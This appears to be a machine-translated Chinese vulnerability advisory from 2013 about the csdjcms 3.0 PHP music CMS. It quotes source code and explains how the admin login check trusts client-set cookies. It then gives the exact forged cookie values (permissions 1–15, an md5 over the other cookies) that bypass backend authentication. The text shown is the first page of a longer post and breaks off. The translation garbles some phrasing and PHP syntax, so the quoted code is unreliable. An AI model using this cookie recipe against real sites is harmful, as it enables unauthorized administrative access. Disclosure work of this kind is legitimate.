csdjcms(Cheng's dance music Management System) V 3.0 getshell vulnerabilities-vulnerability warning-the black bar safety net

2013-12-19T00:00:00
ID MYHACK58:62201341496
Type myhack58
Reporter 佚名
Modified 2013-12-19T00:00:00

Description

csdjcms a YY hack and YY pigs flow like with the sing website.

csdjcms V 2.5 code

//The old rules first home start looking

the include_once(“include/install.php”);

if(S_IsInstall==0){

header(“Location:install/install.php”);

}

the include_once(“include/label.php”);

if(S_Webmode==1 or ! file_exists(“index.html”)){

//Buffer

$cache_id =’index_’;

if(! ($cache_opt->start($cache_id))){

echo GetTemp(“index.html”,0);

$cache_opt->end();

}

}

else{

header(“Location:index.html”);

}

//Look at his configuration.

function SafeRequest($key,$mode,$isfilter=”){

set_magic_quotes_runtime(0);

$magic= get_magic_quotes_gpc();

switch ($mode){

case ‘post’:

$value=isset($_POST[$key]) ?$ magic? trim($_POST[$key]):addslashes(trim($_POST[$key])) : ”;

break;

case ‘get’:

$value=isset($_GET[$key]) ?$ magic? trim($_GET[$key]):addslashes(trim($_GET[$key])) : ”;

break;

default:

$value=isset($_POST[$key]) ?$ magic? trim($_POST[$key]):addslashes(trim($_POST[$key])) : ”;

if($value==”"){

$value=isset($_GET[$key]) ?$ magic? trim($_GET[$key]):addslashes(trim($_GET[$key])) : ”;

}

break;

}

if($isfilter!=”) {

$value=lib_replace_end_tag($value);

}

return $value;

}

//Variables submission to the addslashes security filter

//Study for a long time the source code found in the background of the serious emergence of a large security

include “../include/conn.php”;

include “../include/function.php”;

include “admin_version.php”;

include “admin_loginstate.php”; //problem is in this file

//With the

if(empty($_COOKIE['S_AdminID'])){ //first see if there is s_adminid this cooke

echo “<script>window. location=’admin_login.php’</script>”;

}

elseif($_COOKIE['S_Login']!= md5($_COOKIE['S_AdminID'].$ _COOKIE['S_AdminUserName'].$ _COOKIE['S_AdminPassWord'].$ _COOKIE['S_Permission'])){

//Here is the key to the problem.

If the s_login value equal to four cookies are added the md5 encryption, can be directly verified by

echo “<script>window. parent. location=’admin_login.php’</script>”;

}

//Background authority to judge

function SystemPer($Column){

if(empty($_COOKIE['S_Permission'])){

die(“<script>jAlert(‘sorry, you have no right to limit the operation of this function!’,' Operation error’,function(R){window. location=’javascript:history. go(-1)’;})</script>”);

}else{

$SystemPermission=explode(“,”,$_COOKIE['S_Permission']); //the permission of the judge, use“,”to split into an array

$StateOK=0;

$ArrSystemPermission=count($SystemPermission);

for($k=0;$k<$ArrSystemPermission;$k++){

if($SystemPermission[$k]==$Column){ //determine

$StateOK=1;

}

}

if($StateOK==0){

die(“<script>jAlert(‘sorry, you have no right to limit the operation of this function!’,' Operation error’,function(R){window. location=’javascript:history. go(-1)’;})</script>”);

}

}

}

//Construct the lustful cookies

//S_Permission

//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

//S_Login

//md5(AdminID+AdminUserName+AdminPassWord+S_Permission)

//S_AdminUserName

//1

//S_AdminPassWord

//1

//S_AdminID

//1

Background successful bypass.

//Look at 3. 0 version, is the same

<? php

Name: PHP version of the stroke's music, CMS management system, v3. 0

[1] [2] next